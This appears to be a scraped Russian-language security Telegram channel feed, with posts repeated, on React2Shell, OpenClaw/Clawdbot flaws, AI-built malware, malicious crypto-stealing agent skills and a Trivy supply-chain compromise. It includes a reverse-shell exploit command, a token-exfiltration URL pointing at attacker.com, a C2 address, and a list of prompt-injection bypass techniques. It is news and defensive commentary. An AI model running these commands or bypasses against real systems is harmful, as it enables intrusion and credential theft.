Небольшое продолжение по CVE-2025-55182
CVE-2025-55182 теперь react2shell, а так же появился стабильный эксплоит.
Получить шелл можно в одну команду:
Подоспел и плагин для Burp: Next.js RSC RCE Scanner.
По данным FOFA в интернете торчит 8.7 миллионов потенциально уязвимых хостов (в Shodan результаты скромнее, но тоже неплохо), а Amazon уже сообщает, что китайские хакеры уже вовсю эксплуатируют уязвимость.
Разбор самой уязвимости можно почитать в блоге SeachLight Cyber и в PoC-разборе от maple3142.
А у Project Disovery появился обновлённый шаблон для Nuclei.
—-
- Gihub Gist: POC for CVE-2025-55182 that works on Next.js 16.0.6
- SeachLight Cyber High Fidelity Detection Mechanism for RSC/Next.js RCE (CVE-2025-55182 & CVE-2025-66478)
- AWS Security Blog: China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182)
CVE-2025-55182 теперь react2shell, а так же появился стабильный эксплоит.
Получить шелл можно в одну команду:
# Предварительно не забываем поднять листенер, скрипт его не поднимает.
python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234
# Или сразу прогнать список
python3 exp.py -f targets.txt --check
Подоспел и плагин для Burp: Next.js RSC RCE Scanner.
По данным FOFA в интернете торчит 8.7 миллионов потенциально уязвимых хостов (в Shodan результаты скромнее, но тоже неплохо), а Amazon уже сообщает, что китайские хакеры уже вовсю эксплуатируют уязвимость.
Разбор самой уязвимости можно почитать в блоге SeachLight Cyber и в PoC-разборе от maple3142.
А у Project Disovery появился обновлённый шаблон для Nuclei.
—-
- Gihub Gist: POC for CVE-2025-55182 that works on Next.js 16.0.6
- SeachLight Cyber High Fidelity Detection Mechanism for RSC/Next.js RCE (CVE-2025-55182 & CVE-2025-66478)
- AWS Security Blog: China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182)
GitHub
GitHub - Spritualkb/CVE-2025-55182-exp: CVE-2025-55182 React Server Components Remote Code Execution Exploit Tool
CVE-2025-55182 React Server Components Remote Code Execution Exploit Tool - Spritualkb/CVE-2025-55182-exp
👎1
Если в AI\ML есть Red Team, то для него должен быть Red Team Field Manual.
А если серьезно, то тема довольно интересная, а тут всё и сразу в одном месте.
Сам Field Manual, инструменты и скрипты так же доступны на Github:
github.com/Shiva108/ai-llm-red-team-handbook
А если серьезно, то тема довольно интересная, а тут всё и сразу в одном месте.
Сам Field Manual, инструменты и скрипты так же доступны на Github:
github.com/Shiva108/ai-llm-red-team-handbook
cph-sec.gitbook.io
README | AI LLM Red Team Handbook and Field Manual
❤2👎1
Год заканчивается, время подводить итоги, показывать какие-нибудь циферки и поделиться своими выводами и видением.
Попробую и я сойти за умного и поделиться своими заметками.
Топ 5 CVE (плюс бонус):
1. React2Shell (CVE-2025-55182) - мой личный топ года. Красиво, эпично и масштабно. 10/10.
2. Windows NTLM V1 Elevation of Privilege Vulnerability (CVE-2025-21311) - мне редко интересны уязвимости в Windows (правда там и на samba импакт), но тут прямо здорово. NTLM V1 в 2025 году? Что может пойти не так?
3. Microsoft WSUS Deserialization RCE (CVE-2025-59287) - снова уязвимость в Windows, но зато какая. А если учесть, что были найдены хосты WSUS, доступные из дикого интернета, то совсем красота получается.
4. Apache Tomcat Path Traversal (CVE-2025-55752) - немного набивший оскомину Tomcat, который каждый год должен быть в таких топах.
5. n8n Remote Code Execution (CVE-2025-68613) - AI-автоматизация врывается в тренды, в том числе и с CVE.
Бонус:
MongoDB Unauthenticated Memory Leak Exploit (MongoBleed) (CVE-2025-14847) - запоздалый "подарок" под конец года. Бага в zlib позволяет злоумышленникам инициировать утечку информации.
Список можно продолжать ещё долго, но остановимся на этом.
Количество CVE от года к году продолжает расти. Если 2024 закончился на ≈ 40 тысячах (40303 по данным CVEDdetails, 39972 по данным NVD), то 2025 заканчивается на 47к+, что показывает примерный прирост ~40% (в среднем 135 новых CVE в день).
По критичности выходит примерно следующее (данные везде разные, возьму за основу CVEFeed.io):
Всего: 49170 CVE
Critical (9.0–10.0): ≈ 13.6 % (6672 уязвимости)
High (7.0–8.9): ≈ 34.1 % (16721 уязвимость)
Medium (4.0–6.9): ≈ 43.8 % (около 21,236 уязвимостей)
Low (0.1–3.9) + N/A ≈ 1.8 % (897 меньшая часть, плюс некоторые без оценки)
N/A: 3 164 ≈ 6.5 %
Данные разнятся, но ± количество и соотношение такое (CVE.ICU показывает схожие цифры, да и пока эти цифры указываешь, информация уже теряет актуальность).
C Weaknesses всё довольно ожидаемо и CWE Top 5 выглядит так:
- XSS (CWE-79)
- SQLi (CWE-89)
- CSRF (CWE-352)
- Missing Authorization (CWE-862)
- Out-of-bounds Write (CWE-787)
Тренды:
- Нейронки: не только в атаке, но и в обороне. Как минимум, детекты дипфейков и прочего AI-generated контента уже более частое явление.
- Supply chain: со временем лучше не становится, и даже в OWASP Top 10 2025 Software Supply Chain Failures находится на 3 месте.
- Nation-state hackers: не особо какая новость, но активность Nation-state хакеров становится делом привычным, и на спад их активность не идёт.
- Инфостилеры никуда не делись: за 2025 утекли данные как минимум 16 компаний\организаций, а модель Malware-as-a-Service превратила стилеры в процветающий "теневой" бизнес.
Хактивисты измельчали, нейронки активно применяются в фишинге и написании зловредов, а в воздухе повис дух quantum threats to cryptography. А ещё падения Cloudflare и AWS.
Сложно сказать, что нам готовит год грядущий, но каждый раз что-то интересное и неожиданное.
Продолжаем вести наблюдение.
Попробую и я сойти за умного и поделиться своими заметками.
Топ 5 CVE (плюс бонус):
1. React2Shell (CVE-2025-55182) - мой личный топ года. Красиво, эпично и масштабно. 10/10.
2. Windows NTLM V1 Elevation of Privilege Vulnerability (CVE-2025-21311) - мне редко интересны уязвимости в Windows (правда там и на samba импакт), но тут прямо здорово. NTLM V1 в 2025 году? Что может пойти не так?
3. Microsoft WSUS Deserialization RCE (CVE-2025-59287) - снова уязвимость в Windows, но зато какая. А если учесть, что были найдены хосты WSUS, доступные из дикого интернета, то совсем красота получается.
4. Apache Tomcat Path Traversal (CVE-2025-55752) - немного набивший оскомину Tomcat, который каждый год должен быть в таких топах.
5. n8n Remote Code Execution (CVE-2025-68613) - AI-автоматизация врывается в тренды, в том числе и с CVE.
Бонус:
MongoDB Unauthenticated Memory Leak Exploit (MongoBleed) (CVE-2025-14847) - запоздалый "подарок" под конец года. Бага в zlib позволяет злоумышленникам инициировать утечку информации.
Список можно продолжать ещё долго, но остановимся на этом.
Количество CVE от года к году продолжает расти. Если 2024 закончился на ≈ 40 тысячах (40303 по данным CVEDdetails, 39972 по данным NVD), то 2025 заканчивается на 47к+, что показывает примерный прирост ~40% (в среднем 135 новых CVE в день).
По критичности выходит примерно следующее (данные везде разные, возьму за основу CVEFeed.io):
Всего: 49170 CVE
Critical (9.0–10.0): ≈ 13.6 % (6672 уязвимости)
High (7.0–8.9): ≈ 34.1 % (16721 уязвимость)
Medium (4.0–6.9): ≈ 43.8 % (около 21,236 уязвимостей)
Low (0.1–3.9) + N/A ≈ 1.8 % (897 меньшая часть, плюс некоторые без оценки)
N/A: 3 164 ≈ 6.5 %
Данные разнятся, но ± количество и соотношение такое (CVE.ICU показывает схожие цифры, да и пока эти цифры указываешь, информация уже теряет актуальность).
C Weaknesses всё довольно ожидаемо и CWE Top 5 выглядит так:
- XSS (CWE-79)
- SQLi (CWE-89)
- CSRF (CWE-352)
- Missing Authorization (CWE-862)
- Out-of-bounds Write (CWE-787)
Тренды:
- Нейронки: не только в атаке, но и в обороне. Как минимум, детекты дипфейков и прочего AI-generated контента уже более частое явление.
- Supply chain: со временем лучше не становится, и даже в OWASP Top 10 2025 Software Supply Chain Failures находится на 3 месте.
- Nation-state hackers: не особо какая новость, но активность Nation-state хакеров становится делом привычным, и на спад их активность не идёт.
- Инфостилеры никуда не делись: за 2025 утекли данные как минимум 16 компаний\организаций, а модель Malware-as-a-Service превратила стилеры в процветающий "теневой" бизнес.
Хактивисты измельчали, нейронки активно применяются в фишинге и написании зловредов, а в воздухе повис дух quantum threats to cryptography. А ещё падения Cloudflare и AWS.
Сложно сказать, что нам готовит год грядущий, но каждый раз что-то интересное и неожиданное.
Продолжаем вести наблюдение.
❤1
Очередной год подходит к завершению, и можно отложить дела и планы в сторону и перейти к салатам и поздравлениям.
Про то, что год был тяжелый все говорят каждый раз, так что не буду это повторять.
В наступающем году желаю достигать своих целей, открывать новые горизонты, строить и ломать (каждый год об этом говорю), но и про отдых не забываем.
Всё будет, как мы любим.
До встречи в 2026.
И по традиции, музыка:
Про то, что год был тяжелый все говорят каждый раз, так что не буду это повторять.
В наступающем году желаю достигать своих целей, открывать новые горизонты, строить и ломать (каждый год об этом говорю), но и про отдых не забываем.
Всё будет, как мы любим.
До встречи в 2026.
И по традиции, музыка:
RUTUBE
Стекловата Новый год
Смотрите видео онлайн «Стекловата Новый год» на канале «Михаил Зверев» в хорошем качестве и бесплатно, опубликованное 13 августа 2024 года в 20:00, длительностью 00:04:00, на видеохостинге RUTUBE.
❤1🔥1🤩1
Про Clawdbot вещают из каждого утюга. Self-hosted-революция, сотни или даже тысячи скупленных Mac Mini. Штука действительно интересная и даже захотелось себе такое развернуть. Но сейчас не об этом.
Из минорных новостей: Clawdbot успел аж 2 раза поменять имя и нынче он OpenClaw. Новость не примечательная, и скорей для общей информации.
Теперь немного интересного:
Exposed Moltbook Database Let Anyone Take Control of Any AI Agent on the Site - из-за мисконфига в сервисе Moltbook утекли данные 1.49 миллионов учётных записей. Moltbook это социальная сеть для агентов, и если верить основателю, то и написана она так же OpenClaw.
1-Click RCE To Steal Your Moltbot Data and Keys - цепочка их двух ошибок:
1. Отсутствие проверки Origin в WebSocket;
2. Утечка токена авторизации.
Уязвимость уже имеет CVE - CVE-2026-25253.
Hacking Clawdbot and Eating Lobster Souls - статья от Джеймисона О'Рейли (Jamieson O’Reilly) с разбором уязвимостей в архитектуре OpenClaw. Тут получился целый набор: агенты доступные из интернета, Prompt Injection, уязвимости в цепочках поставок данных, манипуляция логикой.
Ну и дежурное напоминание от Infostealers про дополнительные угрозы инфостилеров - ClawdBot: The New Primary Target for Infostealers in the AI Era.
В общем, разработка и деплой на вайбе приводит к занятным и не очень приятным результатам.
Из минорных новостей: Clawdbot успел аж 2 раза поменять имя и нынче он OpenClaw. Новость не примечательная, и скорей для общей информации.
Теперь немного интересного:
Exposed Moltbook Database Let Anyone Take Control of Any AI Agent on the Site - из-за мисконфига в сервисе Moltbook утекли данные 1.49 миллионов учётных записей. Moltbook это социальная сеть для агентов, и если верить основателю, то и написана она так же OpenClaw.
1-Click RCE To Steal Your Moltbot Data and Keys - цепочка их двух ошибок:
1. Отсутствие проверки Origin в WebSocket;
2. Утечка токена авторизации.
Уязвимость уже имеет CVE - CVE-2026-25253.
Hacking Clawdbot and Eating Lobster Souls - статья от Джеймисона О'Рейли (Jamieson O’Reilly) с разбором уязвимостей в архитектуре OpenClaw. Тут получился целый набор: агенты доступные из интернета, Prompt Injection, уязвимости в цепочках поставок данных, манипуляция логикой.
Ну и дежурное напоминание от Infostealers про дополнительные угрозы инфостилеров - ClawdBot: The New Primary Target for Infostealers in the AI Era.
В общем, разработка и деплой на вайбе приводит к занятным и не очень приятным результатам.
👍4😁1
VoidLink: Evidence That the Era of Advanced AI-Generated Malware Has Begun
Нейрослоп теперьбанановый зловредный. Check Point Research считает, что мы вошли в эру киберкрайм-сингуялрности и аноны могут создавать зловреды с помощью нейронок.
Речь идёт про VoidLink, и это не просто какая-то обычная малварь, а целый модульный фреймворк, с системой плагинов и защитой (runtime code encryption, self-deletion upon tampering). Разработчики не известны, но на всякий случай виноват Китай, а сам фреймворк активно развивается и есть предположение, что он предназначен для коммерческого использования.
Можно сказать, что это официально первый фреймворк, написанный с использованием нейронок, и не скрипт-кидди, а опытным одиночкой или командой.
Пока не ясно, как будут развиваться события, но начало уже увлекательное.
Нейрослоп теперь
Речь идёт про VoidLink, и это не просто какая-то обычная малварь, а целый модульный фреймворк, с системой плагинов и защитой (runtime code encryption, self-deletion upon tampering). Разработчики не известны, но на всякий случай виноват Китай, а сам фреймворк активно развивается и есть предположение, что он предназначен для коммерческого использования.
Можно сказать, что это официально первый фреймворк, написанный с использованием нейронок, и не скрипт-кидди, а опытным одиночкой или командой.
Пока не ясно, как будут развиваться события, но начало уже увлекательное.
Check Point Research
VoidLink: Evidence That the Era of Advanced AI-Generated Malware Has Begun - Check Point Research
VoidLink's framework marks the first evidence of fully AI-designed and built advanced malware, beginning a new era of AI-generated malware
Раз уж начали неделю c AI, то продолжим небольшим курсом от Aiteera.
Сам курс небольшой и состоит из 9 уроков, и скорей рассчитан на начинающих:
- Introduction
- Basic Defense Bypass
- Advanced Techniques
- Obfuscation Attacks
- Leetspeak Attacks
- Text Reversal Techniques
- Base64 & Encoding Bypasses
- Emoji Obfuscation
- Cipher & Substitution Patterns
А для тех, кто уже преисполнился, может опробовать свои силы в Antijection Challenge.
Сам курс небольшой и состоит из 9 уроков, и скорей рассчитан на начинающих:
- Introduction
- Basic Defense Bypass
- Advanced Techniques
- Obfuscation Attacks
- Leetspeak Attacks
- Text Reversal Techniques
- Base64 & Encoding Bypasses
- Emoji Obfuscation
- Cipher & Substitution Patterns
А для тех, кто уже преисполнился, может опробовать свои силы в Antijection Challenge.
Antijection
Learn - Antijection Challenge | AI Security & Prompt Injection Training
Expert insights, research, and guides on prompt injection, LLM security, and AI safety from the Antijection team.
Forwarded from PurpleBear (Vadim Shelest)
One-Click RCE + unauth API keys leak в OpenClaw/Clawdbot/Moltbot (CVE‑2026‑25253)
Исследователи из Hunt.io разобрали потенциальные последствия эксплуатации уязвимости CVE‑2026‑25253 с оценкой CVSSv3 = 8.8 в OpenClaw и его форках (Clawdbot, Moltbot). Это browser‑automation фреймворки, связывающие LLM с браузером через
🤦 Основная проблема:
1️⃣ Ручка /
2️⃣ Позволяет выгрузить все сохранённые API‑токены провайдеров LLM (OpenAI, Claude, Google AI и др.)
⚙️ Технические детали эксплуатации
OpenClaw до патча:
1️⃣ Читает параметр
2️⃣ Автоматически подключается к нему по WebSocket
3️⃣ Без подтверждения пользователя отправляет auth‑токен на хост атакующего
💫 Сценарий:
1️⃣ Жертва кликает ссылку:
2️⃣ OpenClaw сам подключается к WebSocket на хосте атакующего
3️⃣ Токен мгновенно утекает атакующему
4️⃣ Атакующий использует токен для подключения к Gateway API жертвы
5️⃣ Меняет конфигурацию агента
6️⃣ Вызывает привилегированные API → выполнение произвольного кода на хосте
📊 Масштаб последствий
17 500+ публично доступных инстансов в интернете
68.9% — Clawdbot Control
22.3% — Moltbot Control
8.8% — OpenClaw Control
✅ Рекомендации:
1️⃣ Обновиться до версии OpenClaw v2026.1.29
2️⃣ Считать все ключи скомпрометированными, проверить балансы провайдеров LLM, провести ротацию ключей
3️⃣Использовать естественный интеллект
4️⃣ Не публиковать AI‑агентов в интернет
Исследователи из Hunt.io разобрали потенциальные последствия эксплуатации уязвимости CVE‑2026‑25253 с оценкой CVSSv3 = 8.8 в OpenClaw и его форках (Clawdbot, Moltbot). Это browser‑automation фреймворки, связывающие LLM с браузером через
Playwright. Эти агенты обычно имеют доступ к файловой системе и API‑ключам LLM, что автоматически делает последствия эксплуатации довольно критичными.🤦 Основная проблема:
1️⃣ Ручка /
api/export-auth доступна без аутентификации2️⃣ Позволяет выгрузить все сохранённые API‑токены провайдеров LLM (OpenAI, Claude, Google AI и др.)
⚙️ Технические детали эксплуатации
OpenClaw до патча:
1️⃣ Читает параметр
gatewayUrl из query‑string2️⃣ Автоматически подключается к нему по WebSocket
3️⃣ Без подтверждения пользователя отправляет auth‑токен на хост атакующего
💫 Сценарий:
1️⃣ Жертва кликает ссылку:
https://victim-openclaw-ui/?gatewayUrl=wss://attacker.com/exfil2️⃣ OpenClaw сам подключается к WebSocket на хосте атакующего
3️⃣ Токен мгновенно утекает атакующему
4️⃣ Атакующий использует токен для подключения к Gateway API жертвы
5️⃣ Меняет конфигурацию агента
6️⃣ Вызывает привилегированные API → выполнение произвольного кода на хосте
📊 Масштаб последствий
17 500+ публично доступных инстансов в интернете
68.9% — Clawdbot Control
22.3% — Moltbot Control
8.8% — OpenClaw Control
✅ Рекомендации:
1️⃣ Обновиться до версии OpenClaw v2026.1.29
2️⃣ Считать все ключи скомпрометированными, проверить балансы провайдеров LLM, провести ротацию ключей
3️⃣
4️⃣ Не публиковать AI‑агентов в интернет
hunt.io
Hunting OpenClaw Exposures: CVE-2026-25253 in Internet-Facing AI Agent Gateways
Our research team identified over 17,500 internet-exposed OpenClaw, Clawdbot, and Moltbot instances vulnerable to CVE-2026-25253. This report documents detection methods and infrastructure analysis using Hunt.io
ClawdBot Skills Just Ganked Your Crypto
Немного прослоупочил и пропустил важную веху в эре программного обеспечения для нейронок (или связанного с ними). Теперь это полноценный софт. По крайней мере со своими зловредами в своих "репозиториях".
Кратко:
- 386 вредоносных навыков маскируются под инструменты автоматизации торговли криптой.
- Зловредные навыки, опубликованные пользователем hightower6eu, скачали почти 7000 раз.
- Все вредоносные навыки используют один и тот же С2 (91[.]92[.]242[.]30).
Схема проста: фейковый алерт -> "обязательный AuthTool" -> one-liner или ZIP-архив с exe-файлом.
Цели тривиальны: API‑ключи бирж, приватные ключи (MetaMask), пароли браузеров, ключи SSH, токены AWS/GCP.
Разбираться с этим никто не будет, сам Питер советует делать хорошо, а плохо не делать. Но появилось партнёрство с Virustotal, которое вряд ли радикально изменит ситуацию.
Ссылки и IOC есть в статье.
Нейронки, которые воруют крипту. Если ClawdBot так хорош, то почему он не может сканировать навыки?
Это точно тот киберпанк, который мы заслужили.
Немного прослоупочил и пропустил важную веху в эре программного обеспечения для нейронок (или связанного с ними). Теперь это полноценный софт. По крайней мере со своими зловредами в своих "репозиториях".
Кратко:
- 386 вредоносных навыков маскируются под инструменты автоматизации торговли криптой.
- Зловредные навыки, опубликованные пользователем hightower6eu, скачали почти 7000 раз.
- Все вредоносные навыки используют один и тот же С2 (91[.]92[.]242[.]30).
Схема проста: фейковый алерт -> "обязательный AuthTool" -> one-liner или ZIP-архив с exe-файлом.
Цели тривиальны: API‑ключи бирж, приватные ключи (MetaMask), пароли браузеров, ключи SSH, токены AWS/GCP.
Разбираться с этим никто не будет, сам Питер советует делать хорошо, а плохо не делать. Но появилось партнёрство с Virustotal, которое вряд ли радикально изменит ситуацию.
Ссылки и IOC есть в статье.
Нейронки, которые воруют крипту. Если ClawdBot так хорош, то почему он не может сканировать навыки?
Это точно тот киберпанк, который мы заслужили.
Forwarded from Mikrotik Ninja
https://socket.dev/blog/trivy-under-attack-again-github-actions-compromise
Trivy в GitHub Action взломали.
Если вы использовали Trivy от 0.18.0 до 0.35.0 - мои поздравления - смена паролей в пятницу вечером вам обеспечена
Trivy в GitHub Action взломали.
Если вы использовали Trivy от 0.18.0 до 0.35.0 - мои поздравления - смена паролей в пятницу вечером вам обеспечена
Socket
Trivy Under Attack Again: Widespread GitHub Actions Tag Comp...
Attackers compromised Trivy GitHub Actions by force-updating tags to deliver malware, exposing CI/CD secrets across affected pipelines.